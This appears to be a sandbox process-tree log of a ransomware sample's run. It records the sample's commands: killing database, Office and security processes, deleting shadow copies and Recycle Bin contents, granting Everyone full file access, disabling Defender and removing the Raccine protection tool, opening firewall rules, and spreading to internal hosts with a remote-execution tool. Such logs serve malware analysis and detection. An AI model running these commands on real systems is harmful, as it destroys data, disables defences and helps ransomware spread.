C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM encsvc.exe /F2⤵
- Kills process with taskkill
PID:4148
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM ocomm.exe /F2⤵
- Kills process with taskkill
PID:4592
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM tbirdconfig.exe /F2⤵PID:764
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM PccNTMon.exe /F2⤵PID:2660
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM excel.exe /F2⤵PID:4964
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM msaccess.exe /F2⤵
- Kills process with taskkill
PID:1264
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM dbeng50.exe /F2⤵
- Kills process with taskkill
PID:4780
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM infopath.exe /F2⤵
- Kills process with taskkill
PID:3524
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM CNTAoSMgr.exe /F2⤵PID:2584
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM outlook.exe /F2⤵PID:5036
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM mbamtray.exe /F2⤵
- Kills process with taskkill
PID:3312
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM thebat64.exe /F2⤵
- Kills process with taskkill
PID:5052
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" IM thunderbird.exe /F2⤵PID:4632
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM zoolz.exe /F2⤵
- Kills process with taskkill
PID:4252
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM tmlisten.exe /F2⤵
- Kills process with taskkill
PID:2420
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM dbsnmp.exe /F2⤵PID:4668
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM wordpad.exe /F2⤵
- Kills process with taskkill
PID:4020
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM xfssvccon.exe /F2⤵
- Kills process with taskkill
PID:2500
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM msftesql.exe /F2⤵PID:764
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM mysqld-opt.exe /F2⤵PID:4404
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM powerpnt.exe /F2⤵
- Kills process with taskkill
PID:2604
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM mydesktopqos.exe /F2⤵
- Kills process with taskkill
PID:4896
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM ocautoupds.exe /F2⤵
- Kills process with taskkill
PID:2212
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM ocssd.exe /F2⤵
- Kills process with taskkill
PID:4280
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM visio.exe /F2⤵PID:1928
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM oracle.exe /F2⤵
- Kills process with taskkill
PID:4736
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM mydesktopservice.exe /F2⤵
- Kills process with taskkill
PID:3788
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM winword.exe /F2⤵
- Kills process with taskkill
PID:4832
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM sqlagent.exe /F2⤵PID:4640
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM sqlbrowser.exe /F2⤵
- Kills process with taskkill
PID:4984
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM mysqld-nt.exe /F2⤵PID:2884
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM sqlservr.exe /F2⤵PID:4732
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM sql.exe /f2⤵
- Kills process with taskkill
PID:5016
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM sqld.exe /f2⤵
- Kills process with taskkill
PID:2988
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM mysql.exe /f2⤵
- Suspicious use of AdjustPrivilegeToken
PID:2628
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM mysqld.exe /f2⤵PID:3512
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM oracle.exe /f2⤵PID:2656
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM vmwp.exe /f2⤵PID:4208
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" & Get-WmiObject Win32_Shadowcopy | ForEach-Object { $_Delete(); }2⤵PID:4604
-
-
C:\Windows\SYSTEM32\icacls.exe"icacls" "C:*" /grant Everyone:F /T /C /Q2⤵
- Modifies file permissions
PID:4488
-
-
C:\Windows\SYSTEM32\icacls.exe"icacls" "D:*" /grant Everyone:F /T /C /Q2⤵
- Modifies file permissions
PID:4128
-
-
C:\Windows\SYSTEM32\icacls.exe"icacls" "Z:*" /grant Everyone:F /T /C /Q2⤵
- Modifies file permissions
PID:904
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd.exe" /C C:\Users\Admin\AppData\Local\Temp\tmpCBA2.bat2⤵PID:4476
-
C:\Windows\system32\mountvol.exemountvol3⤵PID:4156
-
-
C:\Windows\system32\find.exefind "}\"3⤵PID:3120
-
-
C:\Windows\system32\mountvol.exemountvol !freedrive!: \\?\Volume{266d1ca4-0000-0000-0000-500600000000}\3⤵PID:4168
-
-
C:\Windows\system32\PING.EXEping -n 2 127.0.0.13⤵
- Runs ping.exe
PID:4132
-
-
C:\Windows\system32\mountvol.exemountvol !freedrive!: \\?\Volume{266d1ca4-0000-0000-0000-100000000000}\3⤵PID:4264
-
-
C:\Windows\system32\PING.EXEping -n 2 127.0.0.13⤵
- Runs ping.exe
PID:4152
-
-
C:\Windows\system32\mountvol.exemountvol !freedrive!: \\?\Volume{63e50be4-9a0d-11eb-a110-806e6f6e6963}\3⤵PID:2504
-
-
C:\Windows\system32\PING.EXEping -n 2 127.0.0.13⤵
- Runs ping.exe
PID:3752
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd.exe" /c rd /s /q %SYSTEMDRIVE%\\$Recycle.bin2⤵PID:4876
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd.exe" /c rd /s /q D:\\$Recycle.bin2⤵PID:4516
-
-
C:\Windows\SYSTEM32\netsh.exe"netsh" advfirewall firewall set rule group=\"Network Discovery\" new enable=Yes2⤵PID:4064
-
-
C:\Windows\SYSTEM32\netsh.exe"netsh" advfirewall firewall set rule group="File and Printer Sharing" new enable=Yes2⤵PID:4000
-
-
C:\Windows\SYSTEM32\netsh.exe"netsh" advfirewall firewall set rule group=\"Network Discovery\" new enable=Yes2⤵PID:4668
-
-
C:\Windows\SYSTEM32\netsh.exe"netsh" advfirewall firewall set rule group=\"File and Printer Sharing\" new enable=Yes2⤵PID:4800
-
-
C:\Windows\SYSTEM32\arp.exe"arp" -a2⤵PID:4276
-
-
C:\Windows\SYSTEM32\icacls.exe"icacls.exe" C:\$RmMetadata\$TxfLog\$TxfLogContainer00000000000000000001 /grant Everyone:F /T /C /Q2⤵
- Modifies file permissions
PID:1072
-
-
C:\Windows\SYSTEM32\icacls.exe"icacls.exe" C:\Users\Admin\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\MANIFEST-000001 /grant Everyone:F /T /C /Q2⤵
- Modifies file permissions
PID:3800
-
-
C:\Windows\SYSTEM32\icacls.exe"icacls.exe" C:\Users\Admin\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Cache\data_0 /grant Everyone:F /T /C /Q2⤵
- Modifies file permissions
PID:2624
-
-
C:\Windows\SYSTEM32\icacls.exe"icacls.exe" C:\vcredist2010_x64.log-MSI_vc_red.msi.txt /grant Everyone:F /T /C /Q2⤵
- Modifies file permissions
PID:1596
-
-
C:\Users\Admin\AppData\Local\Temp\5wzwhgdn.exe"C:\Users\Admin\AppData\Local\Temp\5wzwhgdn.exe" \\10.10.0.33 -d -f -h -s -n 5 -c "C:\Users\Admin\AppData\Local\Temp\1c4b55fefcd78623a6724bb6c7779d0ef02ac20a6069cb9dbd91d753386606bb.bin.sample.exe"2⤵PID:2104
-
-
C:\Users\Admin\AppData\Local\Temp\5wzwhgdn.exe"C:\Users\Admin\AppData\Local\Temp\5wzwhgdn.exe" \\10.10.0.41 -d -f -h -s -n 5 -c "C:\Users\Admin\AppData\Local\Temp\1c4b55fefcd78623a6724bb6c7779d0ef02ac20a6069cb9dbd91d753386606bb.bin.sample.exe"2⤵PID:1116
-
-
C:\Users\Admin\AppData\Local\Temp\5wzwhgdn.exe"C:\Users\Admin\AppData\Local\Temp\5wzwhgdn.exe" \\10.10.0.16 -d -f -h -s -n 5 -c "C:\Users\Admin\AppData\Local\Temp\1c4b55fefcd78623a6724bb6c7779d0ef02ac20a6069cb9dbd91d753386606bb.bin.sample.exe"2⤵PID:5084
-
-
C:\Users\Admin\AppData\Local\Temp\5wzwhgdn.exe"C:\Users\Admin\AppData\Local\Temp\5wzwhgdn.exe" \\10.10.0.14 -d -f -h -s -n 5 -c "C:\Users\Admin\AppData\Local\Temp\1c4b55fefcd78623a6724bb6c7779d0ef02ac20a6069cb9dbd91d753386606bb.bin.sample.exe"2⤵PID:4892
-
-
C:\Users\Admin\AppData\Local\Temp\5wzwhgdn.exe"C:\Users\Admin\AppData\Local\Temp\5wzwhgdn.exe" \\10.10.0.18 -d -f -h -s -n 5 -c "C:\Users\Admin\AppData\Local\Temp\1c4b55fefcd78623a6724bb6c7779d0ef02ac20a6069cb9dbd91d753386606bb.bin.sample.exe"2⤵
- Suspicious use of AdjustPrivilegeToken
PID:4396
-
-
C:\Users\Admin\AppData\Local\Temp\5wzwhgdn.exe"C:\Users\Admin\AppData\Local\Temp\5wzwhgdn.exe" \\10.10.0.15 -d -f -h -s -n 5 -c "C:\Users\Admin\AppData\Local\Temp\1c4b55fefcd78623a6724bb6c7779d0ef02ac20a6069cb9dbd91d753386606bb.bin.sample.exe"2⤵PID:4440
-
-
C:\Users\Admin\AppData\Local\Temp\5wzwhgdn.exe"C:\Users\Admin\AppData\Local\Temp\5wzwhgdn.exe" \\10.10.0.27 -d -f -h -s -n 5 -c "C:\Users\Admin\AppData\Local\Temp\1c4b55fefcd78623a6724bb6c7779d0ef02ac20a6069cb9dbd91d753386606bb.bin.sample.exe"2⤵PID:4844
-
-
C:\Windows\SYSTEM32\icacls.exe"icacls.exe" C:\vcredist2010_x64.log.html /grant Everyone:F /T /C /Q2⤵
- Modifies file permissions
PID:5768
-
-
C:\Windows\SYSTEM32\icacls.exe"icacls.exe" C:\vcredist2012_x64_0_vcRuntimeMinimum_x64.log /grant Everyone:F /T /C /Q2⤵
- Modifies file permissions
PID:4384
-
-
C:\Windows\SYSTEM32\icacls.exe"icacls.exe" C:\vcredist2012_x64_1_vcRuntimeAdditional_x64.log /grant Everyone:F /T /C /Q2⤵
- Modifies file permissions
PID:5936
-
-
C:\Windows\SYSTEM32\icacls.exe"icacls.exe" C:\Users\Public\Libraries\RecordedTV.library-ms /grant Everyone:F /T /C /Q2⤵
- Modifies file permissions
PID:5384
-
-
C:\Windows\SYSTEM32\icacls.exe"icacls.exe" C:\Users\All Users\regid.1991-06.com.microsoft\regid.1991-06.com.microsoft Office 16 Click-to-Run Extensibility Component.swidtag /grant Everyone:F /T /C /Q2⤵
- Modifies file permissions
PID:5816
-
-
C:\Windows\SYSTEM32\icacls.exe"icacls.exe" C:\Users\All Users\regid.1991-06.com.microsoft\regid.1991-06.com.microsoft Office 16 Click-to-Run Licensing Component.swidtag /grant Everyone:F /T /C /Q2⤵
- Modifies file permissions
PID:5956
-
-
C:\Windows\SYSTEM32\icacls.exe"icacls.exe" C:\Users\All Users\regid.1991-06.com.microsoft\regid.1991-06.com.microsoft Office 16 Click-to-Run Localization Component.swidtag /grant Everyone:F /T /C /Q2⤵
- Modifies file permissions
PID:5664
-
-
C:\Windows\SYSTEM32\icacls.exe"icacls.exe" C:\Users\All Users\regid.1991-06.com.microsoft\regid.1991-06.com.microsoft_Windows-10-Pro.swidtag /grant Everyone:F /T /C /Q2⤵
- Modifies file permissions
PID:5584
-
-
C:\Windows\SYSTEM32\icacls.exe"icacls.exe" C:\Users\All Users\Package Cache\{F7CAC7DF-3524-4C2D-A7DB-E16140A3D5E6}v14.21.27702\packages\vcRuntimeMinimum_amd64\cab1.cab /grant Everyone:F /T /C /Q2⤵
- Modifies file permissions
PID:5864
-
-
C:\Windows\SYSTEM32\icacls.exe"icacls.exe" C:\Users\All Users\Package Cache\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}\state.rsm /grant Everyone:F /T /C /Q2⤵
- Modifies file permissions
PID:5224
-
-
C:\Windows\SYSTEM32\icacls.exe"icacls.exe" C:\Users\All Users\Package Cache\{ef6b00ec-13e1-4c25-9064-b2f383cb8412}\state.rsm /grant Everyone:F /T /C /Q2⤵
- Modifies file permissions
PID:4380
-
-
C:\Windows\SYSTEM32\icacls.exe"icacls.exe" C:\Users\All Users\Package Cache\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\packages\vcRuntimeMinimum_amd64\cab1.cab /grant Everyone:F /T /C /Q2⤵
- Modifies file permissions
PID:5856
-
-
C:\Windows\SYSTEM32\icacls.exe"icacls.exe" C:\Users\All Users\Package Cache\{CB0836EC-B072-368D-82B2-D3470BF95707}v12.0.40660\packages\vcRuntimeMinimum_amd64\cab1.cab /grant Everyone:F /T /C /Q2⤵
- Modifies file permissions
PID:2604
-
-
C:\Windows\SYSTEM32\icacls.exe"icacls.exe" C:\Users\All Users\Package Cache\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}\state.rsm /grant Everyone:F /T /C /Q2⤵
- Modifies file permissions
PID:4492
-
-
C:\Windows\SYSTEM32\icacls.exe"icacls.exe" C:\Users\All Users\Package Cache\{5740BD44-B58D-321A-AFC0-6D3D4556DD6C}v12.0.40660\packages\vcRuntimeAdditional_amd64\cab1.cab /grant Everyone:F /T /C /Q2⤵
- Modifies file permissions
PID:4436
-
-
C:\Windows\SYSTEM32\icacls.exe"icacls.exe" C:\Users\All Users\Package Cache\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\packages\vcRuntimeAdditional_amd64\cab1.cab /grant Everyone:F /T /C /Q2⤵
- Modifies file permissions
PID:4884
-
-
C:\Windows\SYSTEM32\icacls.exe"icacls.exe" C:\Users\All Users\Package Cache\{12578975-C765-4BDF-8DDC-3284BC0E855F}v14.21.27702\packages\vcRuntimeAdditional_amd64\cab1.cab /grant Everyone:F /T /C /Q2⤵
- Modifies file permissions
PID:1636
-
-
C:\Windows\SYSTEM32\icacls.exe"icacls.exe" C:\Users\All Users\Oracle\Java\java.settings.cfg /grant Everyone:F /T /C /Q2⤵
- Modifies file permissions
PID:4960
-
-
C:\Windows\SYSTEM32\icacls.exe"icacls.exe" C:\Users\All Users\Oracle\Java\installcache_x64\baseimagefam8 /grant Everyone:F /T /C /Q2⤵
- Modifies file permissions
PID:1160
-
-
C:\Windows\SYSTEM32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows Security Health\Logs\SHS-04102021-070122-3-1-15063.0.amd64fre.rs2_release.170317-1834.bin /grant Everyone:F /T /C /Q2⤵
- Modifies file permissions
PID:2624
-
-
C:\Windows\SYSTEM32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows Security Health\Logs\SHS-04102021-070349-3-1-15063.0.amd64fre.rs2_release.170317-1834.bin /grant Everyone:F /T /C /Q2⤵
- Modifies file permissions
PID:4452
-
-
C:\Windows\SYSTEM32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows Security Health\Logs\SHS-04102021-070541-3-1-15063.0.amd64fre.rs2_release.170317-1834.bin /grant Everyone:F /T /C /Q2⤵
- Modifies file permissions
PID:2260
-
-
C:\Windows\SYSTEM32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows NT\MSScan\WelcomeScan.jpg /grant Everyone:F /T /C /Q2⤵
- Modifies file permissions
PID:4328
-
-
C:\Windows\SYSTEM32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows NT\MSFax\VirtualInbox\en-US\WelcomeFax.tif /grant Everyone:F /T /C /Q2⤵
- Modifies file permissions
PID:5256
-
-
C:\Windows\SYSTEM32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows NT\MSFax\Common Coverpages\en-US\confident.cov /grant Everyone:F /T /C /Q2⤵
- Modifies file permissions
PID:5268
-
-
C:\Windows\SYSTEM32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows NT\MSFax\Common Coverpages\en-US\fyi.cov /grant Everyone:F /T /C /Q2⤵
- Modifies file permissions
PID:5152
-
-
C:\Windows\SYSTEM32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows NT\MSFax\Common Coverpages\en-US\generic.cov /grant Everyone:F /T /C /Q2⤵
- Modifies file permissions
PID:5172
-
-
C:\Windows\SYSTEM32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows NT\MSFax\Common Coverpages\en-US\urgent.cov /grant Everyone:F /T /C /Q2⤵PID:1616
-
-
C:\Windows\SYSTEM32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows Live\WLive48x48.png /grant Everyone:F /T /C /Q2⤵
- Modifies file permissions
PID:5276
-
-
C:\Windows\SYSTEM32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows Defender\Support\MPDetection-04102021-065958.log /grant Everyone:F /T /C /Q2⤵
- Modifies file permissions
PID:1116
-
-
C:\Windows\SYSTEM32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows Defender\Support\MPLog-04102021-065958.log /grant Everyone:F /T /C /Q2⤵
- Modifies file permissions
PID:6052
-
-
C:\Windows\SYSTEM32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows Defender\Support\MpWppTracing-04102021-065958-00000003-ffffffff.bin /grant Everyone:F /T /C /Q2⤵
- Modifies file permissions
PID:6008
-
-
C:\Windows\SYSTEM32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows Defender\Scans\mpcache-5C093E9FCD1354685BA9043E2217B5B122F667C4.bin /grant Everyone:F /T /C /Q2⤵
- Modifies file permissions
PID:4476
-
-
C:\Windows\PAExec-4532-RJMQBVDN.exeC:\Windows\PAExec-4532-RJMQBVDN.exe -service1⤵PID:4684
-
C:\Users\Admin\AppData\Local\Temp\48be948c3345e8c8b10c612a88eeee6bd1bf8af076092cf88268a268e889e698.bin.sample.exe"C:\Users\Admin\AppData\Local\Temp\48be948c3345e8c8b10c612a88eeee6bd1bf8af076092cf88268a268e889e698.bin.sample.exe"2⤵PID:4624
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -EnableControlledFolderAccess Disabled3⤵PID:4240
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" Get-MpPreference -verbose3⤵PID:4156
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableArchiveScanning $true3⤵PID:4036
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableBlockAtFirstSeen $true3⤵PID:2144
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableIOAVProtection $true3⤵PID:4952
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisablePrivacyMode $true3⤵PID:4572
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableScriptScanning $true3⤵PID:4276
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -HighThreatDefaultAction 6 -Force3⤵PID:5072
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -LowThreatDefaultAction 63⤵PID:4344
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -MAPSReporting 03⤵PID:4576
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -ModerateThreatDefaultAction 63⤵PID:5104
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -SevereThreatDefaultAction 63⤵PID:4548
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -SignatureDisableUpdateOnStartupWithoutEngine $true3⤵PID:5132
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -SubmitSamplesConsent 23⤵PID:5352
-
-
C:\Windows\system32\taskkill.exe"taskkill" /F /IM RaccineSettings.exe3⤵
- Kills process with taskkill
PID:5560
-
-
C:\Windows\system32\reg.exe"reg" delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Raccine Tray" /F3⤵PID:5716
-
-
C:\Windows\system32\reg.exe"reg" delete HKCU\Software\Raccine /F3⤵
- Modifies registry key
PID:5780
-
-
C:\Windows\system32\schtasks.exe"schtasks" /DELETE /TN "Raccine Rules Updater" /F3⤵PID:5852
-
-
C:\Windows\system32\sc.exe"sc.exe" config Dnscache start= auto3⤵PID:5912
-
-
C:\Windows\system32\sc.exe"sc.exe" config FDResPub start= auto3⤵PID:5960
-
-
C:\Windows\system32\sc.exe"sc.exe" config SQLTELEMETRY start= disabled3⤵PID:5932
-
-
C:\Windows\system32\netsh.exe"netsh" advfirewall firewall set rule group=\"Network Discovery\" new enable=Yes3⤵PID:5920
-
-
C:\Windows\system32\sc.exe"sc.exe" config SQLTELEMETRY$ECWDB2 start= disabled3⤵PID:6072
-
-
C:\Windows\system32\sc.exe"sc.exe" config SstpSvc start= disabled3⤵PID:6096
-
-
C:\Windows\system32\sc.exe"sc.exe" config SSDPSRV start= auto3⤵PID:6064
-
-
C:\Windows\system32\sc.exe"sc.exe" config SQLWriter start= disabled3⤵PID:5156
-
-
C:\Windows\system32\sc.exe"sc.exe" config upnphost start= auto3⤵
- Suspicious use of AdjustPrivilegeToken
PID:2616
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM mspub.exe /F3⤵PID:5388
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM synctime.exe /F3⤵
- Kills process with taskkill
PID:4836
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM mspub.exe /F3⤵
- Kills process with taskkill
PID:5048
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM mydesktopqos.exe /F3⤵PID:4652
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM mydesktopservice.exe /F3⤵
- Kills process with taskkill
PID:5496
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM sqbcoreservice.exe /F3⤵PID:5592
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM Ntrtscan.exe /F3⤵PID:5648
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM onenote.exe /F3⤵
- Kills process with taskkill
PID:5856
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM agntsvc.exe /F3⤵
- Kills process with taskkill
PID:5992
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM mysqld.exe /F3⤵
- Kills process with taskkill
PID:6092
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM firefoxconfig.exe /F3⤵
- Kills process with taskkill
PID:4212
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM isqlplussvc.exe /F3⤵PID:6136
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM thebat.exe /F3⤵
- Kills process with taskkill
PID:4172
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM PccNTMon.exe /F3⤵
- Kills process with taskkill
PID:4436
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM steam.exe /F3⤵PID:5560
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM sqlwriter.exe /F3⤵
- Kills process with taskkill
PID:496
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM outlook.exe /F3⤵PID:5412
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM ocomm.exe /F3⤵
- Kills process with taskkill
PID:4124
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM msaccess.exe /F3⤵
- Kills process with taskkill
PID:5504
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM encsvc.exe /F3⤵PID:992
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM tmlisten.exe /F3⤵PID:4824
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM tbirdconfig.exe /F3⤵
- Kills process with taskkill
PID:4976
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM infopath.exe /F3⤵PID:4680
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM mydesktopqos.exe /F3⤵PID:5576
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM excel.exe /F3⤵PID:4424
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM msftesql.exe /F3⤵
- Kills process with taskkill
PID:4668
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM dbeng50.exe /F3⤵PID:4204
-
-
C:\Windows\system32\netsh.exe"netsh" advfirewall firewall set rule group=\"File and Printer Sharing\" new enable=Yes3⤵PID:5388
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM mbamtray.exe /F3⤵PID:4472
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM visio.exe /F3⤵
- Kills process with taskkill
PID:5012
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM CNTAoSMgr.exe /F3⤵PID:6060
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM powerpnt.exe /F3⤵PID:5424
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM thebat64.exe /F3⤵
- Kills process with taskkill
PID:5800
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM zoolz.exe /F3⤵
- Kills process with taskkill
PID:4492
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM mydesktopservice.exe /F3⤵
- Kills process with taskkill
PID:5724
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM mysqld-nt.exe /F3⤵PID:5756
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" IM thunderbird.exe /F3⤵PID:5740
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM wordpad.exe /F3⤵
- Kills process with taskkill
PID:5168
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM dbsnmp.exe /F3⤵
- Kills process with taskkill
PID:2876
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM mysqld-opt.exe /F3⤵PID:5976
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM winword.exe /F3⤵PID:5992
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM xfssvccon.exe /F3⤵
- Kills process with taskkill
PID:4072
-
-
C:\Windows\system32\arp.exe"arp" -a3⤵PID:6088
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM ocautoupds.exe /F3⤵
- Kills process with taskkill
PID:6104
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM ocssd.exe /F3⤵
- Kills process with taskkill
PID:5912
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM oracle.exe /F3⤵
- Kills process with taskkill
PID:4452
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM sqlagent.exe /F3⤵
- Kills process with taskkill
PID:5060
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM sqlbrowser.exe /F3⤵
- Kills process with taskkill
PID:4496
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM sqlservr.exe /F3⤵PID:3192
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM ragent.exe /f3⤵
- Kills process with taskkill
PID:4308
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM sqld.exe /f3⤵
- Kills process with taskkill
PID:4144
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM rmngr.exe /f3⤵
- Kills process with taskkill
PID:396
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM rphost.exe /f3⤵PID:4184
-
-
